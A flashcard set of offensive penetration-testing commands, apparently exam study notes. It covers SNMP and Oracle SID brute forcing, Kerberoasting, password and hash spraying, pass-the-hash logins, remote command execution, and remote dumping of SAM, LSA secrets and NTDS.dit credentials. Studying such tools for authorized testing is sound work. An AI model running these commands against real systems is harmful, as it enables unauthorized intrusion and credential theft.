Linux Hacking Commands Flashcards
How to walk OIDs snmp?
snmpwalk -v2c -c [comunity string] [ip]
How to brute force community strings snmp?
onesixtyone -c [wordlist] [ip]
How to bruteforce OIDs snmp?
braa [community string]@[ip]:.1.3.6.*
How to bruteforce oracle sids with nmap?
sudo nmap -p 1521 –open –script oracle-sid-brute
How to enumerate oracledb service?
./odat.py all -s [ip]
How to connect to oracledb service?
sqlplus [user]/[pass]@[ip]/[sid]
How to enumerate IPMI with nmap?
sudo nmap -sU –script ipmi-version -p 623 [hostname]
What is the IPMI dumphashes module metasploit?
use auxiliary/scanner/ipmi/ipmi_dumphashes
How to use xfreerdp with pass the hash?
xfreerdp /v:[ip] /u:[user] /pth:[hash]
How to kerberoast with impacket
GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request
How to kerberoast on domain joined machine rubeus?
Rubeus.exe kerberoast
How to check if smbexec is enabled with smbmap?
smbmap -H $ip -u [username] -p [password] -x “whoami”
how to map an smb share with smbmap?
smbmap -H [ip] -u [username] -p [password] -r [share name]
How to spray passwords for AD users?
nxc smb [host] -u [wordlist of users] -p [password wordlist] –continue-on-success
How to spray hashes for AD users?
nxc smb [host] -u [wordlist of users] -H [hash list] –continue-on-success
How to check if smb exec is enabled with nxc?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami
How to check if smb exec is enabled with nxc and execute command with local admin?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami —local-auth
How to enumerate smb shares with nxc?
crackmapexec smb [ip] -u [user] -p [pass] –shares
How to enumerate domain users with rid brute?
nxc smb $ip -u [user] -p [pass] –rid-brute
How to remotely dump lsa?
crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –lsa
How to remotely dump SAM?
crackmapexec smb [ip] –local-auth -u ‘admin’ -p [pass] –sam
How to remotely dump NTDS.dit
crackmapexec smb [ip] -u [user] -p [pass] –ntds
How to remotely execute commands with wmi?
wmiexec.py [user]:[pass]@[ip] [command]
How to remotely execute commands with wmi by passing a hash?
python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]